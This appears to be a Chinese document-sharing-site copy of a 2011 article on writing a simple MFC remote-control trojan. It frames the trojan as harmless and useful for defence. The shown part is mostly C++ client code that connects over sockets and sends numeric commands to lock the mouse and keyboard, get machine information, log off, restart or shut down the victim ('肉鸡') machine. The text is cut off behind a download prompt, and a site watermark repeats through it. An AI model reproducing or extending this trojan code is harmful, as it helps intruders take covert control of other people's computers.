一种简单木马应用程序的编写

MFC编写,功能多样,较为全面。

一种简单木马程序的编写

xxxxxxx

2011.4.4

摘要：

本文描述了一种简单木马程序的编写过程，所写应用程序可以实现对肉鸡电脑进行锁定鼠标，解除鼠标锁定，锁定键盘，解除键盘锁定，隐藏任务栏，显示任务栏，查看进程，杀掉进程，注销，关机，重启，向肉鸡发送消息等简单的操作，实现一定程度上的远程管理，本身不带伤害性，也没有感染力，是一种简单的木马雏形，可以通过其对木马的特性和工作原理有一定程度上的了解，为人们对木马进行防护时提供一定的参考。

引言：

特洛伊木马借自古希腊神话《木马屠城计》，现今计算机术语借用其名，意思是“一经进入，后患无穷”。特洛伊木马原则上只是一种远程管理工具，其本身不具有伤害性，也没有感染力，所以不能称之为病毒，当然，也有人称之为第二代病毒，但其常常被称为病毒，因为如果有人不当使用的话，会产生比病毒更强的破坏力。

本文通过对一种用MFC编写的简单木马的编写过程进行分析，指出了木马基本的工作原理，详细地指出了该简单木马各部分功能的实现，为对木马的防护提供了很大的参考价值。

正文：

通常情况下，木马程序都包括客户端和服务端两个程序，其中客户端程序时攻击者用于远程控制植入木马的机器的程序，服务器端程序即是木马程序。 当服务器端程序在被感染的机器上成功运行以后，攻击者就可以使用客户端与服务端建立连接，并进一步控制被感染的机器。在客户端和服务端通信协议的选择上，绝大多数木马使用的是TCP/IP，本文所述木马程序是采用MFC的socket编程技术实现客户端和服务器端的通信。

下面本文详细地说明木马程序中各个功能模块的实现。

客户端程序是操纵木马程序者控制被木马感染的机器的软件，可以用MFC写一个控制端的用户界面。需要在程序中建立一个套接字，用于接收服务器端（即木马程序）发回的消息，其最重要的作用是向服务器端发送不同的指令，使服务器端电脑执行要求的操作。

在程序中初始化套接字：

WSADATA wsd;

WSAStartup(MAKEWORD(2,2),&wsd);

然后从MFC中的CSocket类派生一个CClientSocket类，并在其中添加主对话框类的变量，从而实现为主对话框创建套接字的目的。

然后写接受连接函数：

voidCClientDlg::OnLogin()

{

MFC编写,功能多样,较为全面。

// TODO: Add your control notification handler code here

CStringstrIP,strPort;

UINT port;

m_ServerIP.GetWindowText(strIP);

m_ServerPort.GetWindowText(strPort);

if(strIP.IsEmpty())

{

MessageBox("请设置服务器信息","提示");

return;

}

if(!strPort.IsEmpty())

port=atoi(strPort);

else

port=atoi("5555");

if(m_SockClient.Connect(strIP,port))

{

MessageBox("连接服务器成功","提示");

}

else

{

MessageBox("连接服务器失败","提示");

}

}

接下来写发送命令函数：

voidCClientDlg::OnSendText()

{

// TODO: Add your control notification handler code here

CStringstrText,strInfo;

m_Text.GetWindowText(strText);

if(!strText.IsEmpty())

{

strInfo.Format("%s",strText);

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

else

{

MessageBox("连接服务器失败！","提示");

}

m_Text.SetWindowText("");

}

然后为相应按钮添加发送相应命令的函数：

MFC编写,功能多样,较为全面。

//命令获取肉鸡电脑信息函数

voidCClientDlg::OnGetInfo()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","1");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//清除信息函数

voidCClientDlg::OnDeIeInfo()

{

// TODO: Add your control notification handler code here

m_List.ResetContent();

m_List.SendMessage(LB_SETHORIZONTALEXTENT,0,0);

}

//命令那个锁定鼠标函数

voidCClientDlg::OnMouseLock()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","2");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令开启鼠标锁定函数

voidCClientDlg::OnMouseOpen()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","3");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令肉鸡电脑注销函数

voidCClientDlg::OnComExit()

{

MFC编写,功能多样,较为全面。

CStringstrInfo;

strInfo.Format("%s","4");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令肉鸡电脑重启函数

voidCClientDlg::OnComRes()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","5");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令肉鸡电脑关机函数

voidCClientDlg::OnComShutdown()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","6");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令肉鸡电脑锁定键盘函数

voidCClientDlg::OnKeyLock()

{

// TODO: Add your control notification handler code here

CStringstrInfo;

strInfo.Format("%s","7");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLength()),strInfo.GetLength());

}

//命令肉鸡电脑开启锁定键盘函数

voidCClientDlg::OnKeyOpen()

{

MFC编写,功能多样,较为全面。

CStringstrInfo;

strInfo.Format("%s","8");

int

len=m_SockClient.Send(strInfo.GetBuffer(strInfo.GetLeng …… 此处隐藏：10504字，全部文档内容请下载后查看。喜欢就下载吧 ……